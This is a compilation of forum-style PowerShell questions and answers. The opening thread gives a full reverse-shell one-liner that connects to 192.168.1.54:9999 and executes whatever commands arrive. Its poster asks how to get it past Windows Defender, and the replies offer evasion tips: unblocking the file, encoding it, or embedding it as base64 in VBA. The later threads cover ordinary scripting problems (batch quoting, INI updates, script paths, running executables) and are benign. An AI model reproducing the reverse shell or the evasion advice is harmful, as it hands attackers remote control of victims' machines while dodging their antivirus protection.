powershell reverse shell AV evasion - powershell

I'm trying to run a PowerShell reverse shell on Windows 10. Anyway, every time it is blocked by Windows Defender. How can I bypass it?
In a file I store the payload $client = New-Object System.Net.Sockets.TCPClient('192.168.1.54',9999);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
then I use xencrypt (https://github.com/the-xentropy/xencrypt) to obfuscate the code but when I
run powershell -NoP -NonI -W Hidden -Exec Bypass .\revshell.ps1
I get Questo script include contenuto dannoso ed è stato bloccato dal software antivirus.
In riga:18 car:1
+ IEX($piifnga)
+ ~~~~~~~~~~~~~
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
QUESTION: is there a way to bypass this check?

Have you tried Unblock-File .\revshell.ps1 before trying to run the reverse shell script (understanding the risks associated with running untrusted code downloaded onto the machine)?

Just encode it, or you can change it to base64 to embed it in VBA.

Related

Trying to run a powershell command from bat script

I am trying to run the following powershell command from a .bat script
[void] [reflection.assembly]::loadwithpartialname("System.Windows.Forms")
[reflection.assembly]::loadwithpartialname("System.Drawing")
$notify = new-object system.windows.forms.notifyicon
$notify.icon = [System.Drawing.SystemIcons]::Information
$notify.visible = $true
$notify.showballoontip(10,"Copied!","Map names have been copied to the clipboard",[system.windows.forms.tooltipicon]::None)
The code is intended to produce a simple balloon notification in the bottom right hand corner of the screen.
I have tested the code in PowerShell and it works just fine there; however, I can't get it to work in cmd / via a .bat script.
I don't want to have to point to a separate PowerShell file; I need it all to run from within this one script.
I have realised that I need to address that this is a PowerShell script at the beginning of the script so that it runs correctly, so I have modified it to the following:
powershell -Command "& {[void] [reflection.assembly]::loadwithpartialname("System.Windows.Forms"); [reflection.assembly]::loadwithpartialname("System.Drawing"); $notify = new-object system.windows.forms.notifyicon; $notify.icon = [System.Drawing.SystemIcons]::Information; $notify.visible = $true; $notify.showballoontip(10,"Copied!","Map names have been copied to the clipboard",[system.windows.forms.tooltipicon]::None);}"
From everything I have read on here for people with similar problems this should work. I can get cmd to run other simple PowerShell commands which appear to work just fine, such as
powershell -Command "& { Get-Process }"
so what am I doing wrong here?
When I run the above code I get the following error message on cmd:
At line:1 char:54
+ & {[void] [reflection.assembly]::loadwithpartialname(System.Windows.F ...
+ ~
Missing ')' in method call.
At line:1 char:54
+ ... eflection.assembly]::loadwithpartialname(System.Windows.Forms); [refl ...
+ ~~~~~~~~~~~~~~~~~~~~
Unexpected token 'System.Windows.Forms' in expression or statement.
At line:1 char:3
+ & {[void] [reflection.assembly]::loadwithpartialname(System.Windows.F ...
+ ~
Missing closing '}' in statement block or type definition.
At line:1 char:74
+ ... flection.assembly]::loadwithpartialname(System.Windows.Forms); [refle ...
+ ~
Unexpected token ')' in expression or statement.
At line:1 char:120
+ ... m.Windows.Forms); [reflection.assembly]::loadwithpartialname(System.D ...
+ ~
Missing ')' in method call.
At line:1 char:120
+ ... s); [reflection.assembly]::loadwithpartialname(System.Drawing); $noti ...
+ ~~~~~~~~~~~~~~
Unexpected token 'System.Drawing' in expression or statement.
At line:1 char:134
+ ... ); [reflection.assembly]::loadwithpartialname(System.Drawing); $notif ...
+ ~
Unexpected token ')' in expression or statement.
At line:1 char:300
+ ... ormation; $notify.visible = $true; $notify.showballoontip(10,Copied!, ...
+ ~
Missing expression after ','.
At line:1 char:300
+ ... n; $notify.visible = $true; $notify.showballoontip(10,Copied!,Map nam ...
+ ~~~~~~~
Unexpected token 'Copied!' in expression or statement.
At line:1 char:307
+ ... ; $notify.visible = $true; $notify.showballoontip(10,Copied!,Map name ...
+ ~
Missing argument in parameter list.
Not all parse errors were reported. Correct the reported errors and try again.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : MissingEndParenthesisInMethodCall
Is it something to do with the syntax I am using? Maybe to do with spaces or something?
You can embed your PowerShell script and execute it from a batch file with this hybrid method, and you won't need to worry about escaping any special characters anymore:
<# : Batch Script Section
@rem # The previous line does nothing in Batch, but begins a multiline comment block in PowerShell. This allows a single script to be executed by both interpreters.
@echo off
Title Embed And Execute Powershell Script with a Batch file in Hybrid Mode & Mode 70,3
cd "%~dp0"
Color 1B & echo( & Echo(
Echo( Please Wait ... Loading PowerShell script is in progress ...
Powershell -executionpolicy bypass -Command "Invoke-Expression $([System.IO.File]::ReadAllText('%~f0'))"
EndLocal
pause
goto:eof
#>
# Powershell Script Section begin here...
# Here we execute our powershell commands...
[void] [reflection.assembly]::loadwithpartialname("System.Windows.Forms")
[reflection.assembly]::loadwithpartialname("System.Drawing") | Out-Null
$notify = new-object system.windows.forms.notifyicon
$notify.icon = [System.Drawing.SystemIcons]::Information
$notify.visible = $true
$notify.showballoontip(10,"Copied!","Map names have been copied to the clipboard",[system.windows.forms.tooltipicon]::None)
Here is an example where I used this hybrid method: SpeedTest_Hackoo_Ookla.bat
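The parse errors in the question come from the inner double quotes: cmd.exe hands -Command one double-quoted string, so the first " inside it ends the argument and System.Windows.Forms reaches PowerShell unquoted (which is exactly what the "Unexpected token 'System.Windows.Forms'" message reports). The script below is an added example, not Hackoo's code or the question's: it generates two batch files, one using single quotes inside -Command so cmd.exe never sees a nested double quote, and one using -EncodedCommand so cmd.exe sees no quotes at all. The output file names and the use of Add-Type -AssemblyName in place of the deprecated LoadWithPartialName are my choices.

```powershell
# Added example (not from the original answer): produce .bat files that run an embedded
# PowerShell snippet without tripping over cmd.exe quoting.

# The snippet to embed. Only single quotes are used inside it; cmd.exe splits arguments on
# double quotes only, so single-quoted PowerShell strings pass through untouched.
$snippet = @'
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
$notify = New-Object System.Windows.Forms.NotifyIcon
$notify.Icon = [System.Drawing.SystemIcons]::Information
$notify.Visible = $true
$notify.ShowBalloonTip(10, 'Copied!', 'Map names have been copied to the clipboard', [System.Windows.Forms.ToolTipIcon]::None)
'@

# Form 1: a -Command one-liner. Lines are joined with ';' and the whole thing is wrapped in
# double quotes for cmd.exe. Refuse to continue if the snippet itself contains a double quote,
# because that is precisely the case that produced the errors in the question.
$oneLiner = ($snippet -split "`r?`n" | Where-Object { $_ -ne '' }) -join '; '
if ($oneLiner -match '"') {
    throw 'Snippet contains a double quote; use single quotes inside it or the encoded form.'
}
$commandForm = "powershell -NoProfile -Command `"& { $oneLiner }`""

# Form 2: -EncodedCommand takes the script as base64 of its UTF-16LE bytes, so no character of
# the script is ever interpreted by cmd.exe. cmd.exe limits a command line to about 8 KB,
# which caps the size of script this form can carry.
$encoded     = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($snippet))
$encodedForm = "powershell -NoProfile -EncodedCommand $encoded"

# Write both variants (file names are my choice). "@echo off" keeps the long line off the console.
Set-Content -Path .\notify-command.bat -Value "@echo off`r`n$commandForm" -Encoding Ascii
Set-Content -Path .\notify-encoded.bat -Value "@echo off`r`n$encodedForm" -Encoding Ascii

Write-Host 'Wrote notify-command.bat and notify-encoded.bat'
Write-Host $commandForm
```

Either batch file runs from a double-click or from cmd. For a script that is going to be scheduled or deployed, the plain -Command form (or a signed .ps1 invoked with -File) is the better fit: PowerShell script block logging records both forms decoded, and base64 -EncodedCommand invocations are a routine hunting signal in SOC tooling, so the encoded form tends to generate tickets for legitimate admin scripts.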

Trying to extract version info and save to INI file on Windows 11 with PowerShell

I am not familiar with PowerShell and I am struggling at the outset.
My task I want to achieve:
Get version number from EXE file.
I know I can get that:
(Get-Item "MeetSchedAssistSetup.exe").VersionInfo.ProductVersionRaw
In the console window it displays:
Major Minor Build Revision
----- ----- ----- --------
23 0 3 0
Open an INI file. I installed the PSIni module but this line fails:
$ini = Get-IniContent version_meetschedassist2.ini
It says:
Get-IniContent : The 'Get-IniContent' command was found in the module 'PsIni', but the module could not be loaded. For
more information, run 'Import-Module PsIni'.
At line:1 char:8
+ $ini = Get-IniContent version_meetschedassist2.ini
+ ~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Get-IniContent:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CouldNotAutoloadMatchingModule
How do I load the INI?
My task is to update this bit in the INI:
[MeetSchedAssist Update]
LatestVersion=23.03
LatestVersionString=23.0.3
So I want to:
Open INI
Extract Version from EXE
Update the two INI values from the Version
Save INI
I tried using Import-Module:
Import-Module : File C:\Program Files\WindowsPowerShell\Modules\PsIni\3.1.3\PsIni.psm1 cannot be loaded because running scripts is disabled on
this system. For more information, see about_Execution_Policies at https:/go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ Import-Module PsIni
+ ~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : SecurityError: (:) [Import-Module], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand
No joy.
Here's a very quick and very dirty way of doing this just as an example:
$exe_info = Get-Item -Path '.\MeetSchedAssistSetup.exe'
$ini_path = '.\version_meetschedassist2.ini'
$ini = Get-IniContent -FilePath $ini_path
$ini['MeetSchedAssist Update']['LatestVersion'] =
'{0}.{1}{2}' -f $exe_info.VersionInfo.FileMajorPart,
$exe_info.VersionInfo.FileMinorPart, $exe_info.VersionInfo.FileBuildPart
$ini['MeetSchedAssist Update']['LatestVersionString'] =
'{0}.{1}.{2}' -f $exe_info.VersionInfo.FileMajorPart,
$exe_info.VersionInfo.FileMinorPart, $exe_info.VersionInfo.FileBuildPart
Out-IniFile -FilePath $ini_path -InputObject $ini -Force
Since Get-IniContent gets saved into memory via $ini, you can replace the values with what you need them to be and pass it back out with Out-IniFile, specifying $ini as the -InputObject for it. The values are updated using string formatting of the version info.
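The second error in the question is the real blocker: the PsIni module is a script module, and the machine's execution policy refuses to load any .psm1. The added example below (my code, not the answer's) sidesteps the module with a small INI reader and writer of its own, so it runs under the default policy, and uses the ProductVersionRaw value the question already gets from Get-Item. The file names are the ones from the question; Read-Ini and Write-Ini are my helper names. If you do want PsIni instead, Set-ExecutionPolicy RemoteSigned -Scope Process changes the policy for the current PowerShell process only rather than for the whole machine.

```powershell
# Added example (not from the original answer): update the two version keys in the INI
# without the PsIni module. Paths are those from the question.

function Read-Ini {
    param([Parameter(Mandatory)][string]$Path)
    # Ordered dictionaries so sections and keys are written back in their original order.
    $ini = [ordered]@{}
    $section = ''
    foreach ($raw in Get-Content -LiteralPath $Path) {
        $line = $raw.Trim()
        # Skip blank lines and ';' / '#' comments.
        if ($line -eq '' -or $line.StartsWith(';') -or $line.StartsWith('#')) { continue }
        if ($line -match '^\[(.+)\]$') {
            $section = $Matches[1]
            if (-not $ini.Contains($section)) { $ini[$section] = [ordered]@{} }
            continue
        }
        # key=value; whitespace around '=' is trimmed, the value keeps everything after it.
        if ($line -match '^([^=]+?)\s*=\s*(.*)$') {
            if (-not $ini.Contains($section)) { $ini[$section] = [ordered]@{} }
            $ini[$section][$Matches[1]] = $Matches[2]
        }
    }
    return $ini
}

function Write-Ini {
    param([Parameter(Mandatory)]$Ini, [Parameter(Mandatory)][string]$Path)
    $lines = foreach ($section in $Ini.Keys) {
        if ($section -ne '') { "[$section]" }      # '' holds keys that precede any header
        foreach ($key in $Ini[$section].Keys) { "$key=$($Ini[$section][$key])" }
        ''                                          # blank line between sections
    }
    Set-Content -LiteralPath $Path -Value $lines -Encoding Ascii
}

$exe     = Get-Item -LiteralPath '.\MeetSchedAssistSetup.exe'
$v       = $exe.VersionInfo.ProductVersionRaw    # a System.Version, e.g. 23.0.3.0
$iniPath = '.\version_meetschedassist2.ini'

$ini = Read-Ini -Path $iniPath
if (-not $ini.Contains('MeetSchedAssist Update')) { $ini['MeetSchedAssist Update'] = [ordered]@{} }
# Same two formats as the answer above: 23,0,3 -> "23.03" and "23.0.3".
$ini['MeetSchedAssist Update']['LatestVersion']       = '{0}.{1}{2}'  -f $v.Major, $v.Minor, $v.Build
$ini['MeetSchedAssist Update']['LatestVersionString'] = '{0}.{1}.{2}' -f $v.Major, $v.Minor, $v.Build
Write-Ini -Ini $ini -Path $iniPath
```

Run it from the folder that holds the .exe and the .ini. Because the parser keeps the other sections and keys as they were read, values you did not touch survive the round trip; comments are the one thing this minimal reader drops, which is the trade-off for avoiding the module.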

MyInvocation.MyCommand.Path in ISE vs regular PS

I have an old script that invokes itself with some extra params in a certain situation. This works if run through a regular powershell window
$spath = $script:MyInvocation.MyCommand.Path
$FilePathWithQuotes = '"{0}"' -f $spath
powershell -file $FilePathWithQuotes -NestedCall #ExtraArgs
but if it's run through the ISE I get this error.
powershell : Add-Type : Cannot bind parameter 'Path' to the target.
Exception setting "Path": "Cannot find path At D:\Deploy\File
Deploy.ps1:39 char:5
+ powershell -file $FilePathWithQuotes -NestedCall #ExtraArgs
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (Add-Type : Cann...nnot find path :String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
I added the second line to make sure the spaces weren't the issue but it still fails in the ISE.
Thoughts? I'm on PS 5.1.
Yeah, check for $PSISE, and use that if possible.
$spath = If($PSISE){$psISE.CurrentFile.FullPath}else{$script:MyInvocation.MyCommand.Path}
$FilePathWithQuotes = '"{0}"' -f $spath
powershell -file $FilePathWithQuotes -NestedCall #ExtraArgs
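The branch on $psISE works, but the ISE has one more failure mode: when the file in the editor has not been saved, both $PSCommandPath and MyInvocation.MyCommand.Path are empty, and the re-launch then hands -File an empty quoted string. The added example below (my code, not the answer's) resolves the path the same way in both hosts and refuses to re-launch until a real file exists; Get-RunningScriptPath is my helper name, and -NestedCall is the script's own switch from the question.

```powershell
# Added example (not from the original answer): find the running script's path in the
# console host and in the ISE, and only re-launch when that path points at a real file.

function Get-RunningScriptPath {
    # $PSCommandPath (PowerShell 3+) is set in both hosts when a saved script file is executed.
    if ($PSCommandPath) { return $PSCommandPath }
    # F5 on an unsaved ISE tab leaves $PSCommandPath empty; fall back to the editor's
    # current file, but only if it has been saved to disk at least once.
    if ($psISE -and $psISE.CurrentFile -and -not $psISE.CurrentFile.IsUntitled) {
        return $psISE.CurrentFile.FullPath
    }
    return $null
}

$spath = Get-RunningScriptPath
if (-not $spath -or -not (Test-Path -LiteralPath $spath)) {
    throw 'Cannot determine the script path; save the file before running it.'
}

# One pair of quotes is enough: -File takes the script path as a single argument,
# so paths with spaces such as D:\Deploy\File Deploy.ps1 arrive intact.
$FilePathWithQuotes = '"{0}"' -f $spath
powershell -File $FilePathWithQuotes -NestedCall
```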

powershell execute command and return value

This is probably an easy answer for you experts, but I'm not sure of the best command to use. I want to execute the following command from within PowerShell:
stccmd -rh sldcege-mie003 -rs nsccahs_dev -un Administrator -up STC -cb nsccahs_dev_cb -cmd "status bobRRC_ADT_OUT_FMT"
and return the result.
The code I have so far is:
$sCmd = @'
"stccmd -rh sldcege-mie003 -rs nsccahs_dev -un Administrator -up STC -cb
nsccahs_dev_cb -cmd '\"status bobRRC_ADT_OUT_FMT\"'"
'@
$Result = Invoke-Command $sCmd | Out-String
The error I am getting is:
Invoke-Command : Parameter set cannot be resolved using the specified named par
ameters.
At E:\Andrew\MonitoreGate.ps1:20 char:25
+ $Result = Invoke-Command <<<< $sCmd | Out-String
+ CategoryInfo : InvalidArgument: (:) [Invoke-Command], Parameter
BindingException
+ FullyQualifiedErrorId : AmbiguousParameterSet,Microsoft.PowerShell.Comma
nds.InvokeCommandCommand
If I use Invoke-Expression instead, I get the following:
Invoke-Expression : Unexpected token 'status' in expression or statement.
At E:\Andrew\MonitoreGate.ps1:20 char:28
+ $Result = Invoke-Expression <<<< $sCmd | Out-String
+ CategoryInfo : ParserError: (status:String) [Invoke-Expression]
, ParseException
+ FullyQualifiedErrorId : UnexpectedToken,Microsoft.PowerShell.Commands.In
vokeExpressionCommand
Should i be using Invoke-Command or Invoke-Expression or some other way? Is the $sCmd structure correct in regards to quotes?
The program is to run on same machine (not remotely).
Any help greatly appreciated,
Andrew
Neither; instead use:
Start-Process -FilePath 'path_to_stccmd.exe' -ArgumentList "-rh sldcege-mie003 -rs nsccahs_dev -un Administrator -up STC -cb nsccahs_dev_cb -cmd 'status bobRRC_ADT_OUT_FMT'" -nonewwindow
If you don't see the output using the above, try this:
$exepath = 'path_to_stccmd.exe'
&$exepath arguments

Run tdpsql command from powershell

I have a script that requires 3 mandatory input parameters that will be used to run the backup command for tdpsql.
type (FULL, DIFF or LOG)
SQLServerinstancename
Database (SYSTEM, ALL, )
Within the powershell script I have the following line
$cmd = "C:\Progra~1\Tivoli\TSM\TDPSql\tdpsqlc.exe backup " + $idatabase + " " + $action + " " + $parameter + " /LOGFILE=" + $logdir + $logfile + ""
$tdpsqlexe - The tdpsqlc exe.
$idatabase - Database name
$action = FULL\DIFF\LOG
$parameter = /sqlserver=TCP:" + $sqlserverinstance + " /SQLAUTH=INT /TSMOPTFile='" + $dsmoptfilename + "' /EXCLUDEDB=" + $exclude
& $cmd
When I echo the command it reports out what I use to run it using powershell command line but when I try to run it from Powershell with the & it fails with the following
The term
C:\Progra~1\Tivoli\TSM\TDPSql\tdpsqlc.exe
backup master FULL
/sqlserver=TCP:
/SQLAUT H=INT
/TSMOPTFile=C:\Progra~1\Tivoli\TSM\TDPSql\dsm.opt /EXCLUDEDB=tempdb /LOGFILE=<logfile>
is not recognized as the name of a
cmdlet, function, script file, or
operable program.Check the spelling of
the name, or if a path was included,
verify that the path is correct and
try again. At TDPSQLBackup.ps1:166
char:6
+ & <<<< $cmd >> test2.txt
+ CategoryInfo : ObjectNotFound:
(C:\Progra~1\Tiv...forsqlimran.txt:String)
[], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
Any help will be really appreciated.
You might try Invoke-Expression $cmd instead of & $cmd.
Yes, better to use Invoke-Expression, but if you still want to use & you can do it this way.
$cmd = "C:\Windows\System32\notepad.exe"
$params = "C:\temp\file.txt"
& $cmd $params
Using a var for the program file and a var for the parameters.
Instead of running a batch command you'd better try the PowerShell cmdlets, as follows:
import-module "C:\Program Files\Tivoli\Flashcopymanager\fmmodulemmc.dll"
import-module "C:\Program Files\Tivoli\Flashcopymanager\fmmoduleSQL.dll"
$startTime = get-date
Backup-DpSqlComponent -Name AdventureWorks2012 -BackupDestination TSM -BackupMethod Legacy -Full
$endTime = get-date
$activity = Get-FcmMmcActivity -StartTime $startTime -EndTime $endTime
$activity
Reference link
http://www-01.ibm.com/support/docview.wss?uid=swg21974345
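The stccmd question and the tdpsqlc question above fail for the same reason: & takes its first operand as the name of a command, so & $cmd looks for a program literally called "C:\Progra~1\...\tdpsqlc.exe backup master FULL ...", which is exactly what the CommandNotFoundException reports, and Invoke-Command with a string argument cannot pick a parameter set at all. Invoke-Expression makes the error go away but evaluates whatever the variables contain as PowerShell code, so a database name or option value that comes from user input or a config file is better passed as an argument array. The added example below (my code, not either answer's) does that for both commands through one helper, Invoke-NativeCommand, which is my name; the stccmd path is a placeholder, the tdpsqlc path and option values are the ones posted, and the SQL instance and log path are constructed sample values.

```powershell
# Added example (not from either answer): run an external program with its arguments kept
# separate from the executable path, capture its output and check the exit code.

function Invoke-NativeCommand {
    param(
        [Parameter(Mandatory)][string]$FilePath,
        [string[]]$ArgumentList = @()
    )
    if (-not (Test-Path -LiteralPath $FilePath)) {
        throw "Executable not found: $FilePath"
    }
    # Splatting the array passes each element as one argument; PowerShell quotes elements that
    # contain spaces, so 'status bobRRC_ADT_OUT_FMT' reaches the program as a single argv entry.
    # 2>&1 folds stderr into the captured text; $LASTEXITCODE is the program's own exit code.
    $output = & $FilePath @ArgumentList 2>&1 | Out-String
    [pscustomobject]@{
        ExitCode = $LASTEXITCODE
        Output   = $output
    }
}

# stccmd question: the -cmd value keeps its embedded space without any escaping.
$stc = Invoke-NativeCommand -FilePath 'C:\PLACEHOLDER\path\to\stccmd.exe' -ArgumentList @(
    '-rh', 'sldcege-mie003', '-rs', 'nsccahs_dev', '-un', 'Administrator', '-up', 'STC',
    '-cb', 'nsccahs_dev_cb', '-cmd', 'status bobRRC_ADT_OUT_FMT'
)
$stc.Output

# tdpsqlc question: options are built from variables one argument at a time
# instead of being glued into a single string.
$sqlServerInstance = 'SQLSRV01'                              # constructed sample value
$dsmOptFile        = 'C:\Progra~1\Tivoli\TSM\TDPSql\dsm.opt'
$logFile           = 'C:\logs\tdpsql-backup.log'             # constructed sample value
$tdp = Invoke-NativeCommand -FilePath 'C:\Progra~1\Tivoli\TSM\TDPSql\tdpsqlc.exe' -ArgumentList @(
    'backup', 'master', 'FULL',
    "/sqlserver=TCP:$sqlServerInstance", '/SQLAUTH=INT', "/TSMOPTFile=$dsmOptFile",
    '/EXCLUDEDB=tempdb', "/LOGFILE=$logFile"
)
if ($tdp.ExitCode -ne 0) {
    throw "tdpsqlc failed with exit code $($tdp.ExitCode): $($tdp.Output)"
}
$tdp.Output
```

Because the executable path and the arguments never pass through a second parser, the same helper works unchanged whether a value contains spaces, quotes or shell metacharacters, and the exit code check turns a silent backup failure into a hard error in the script.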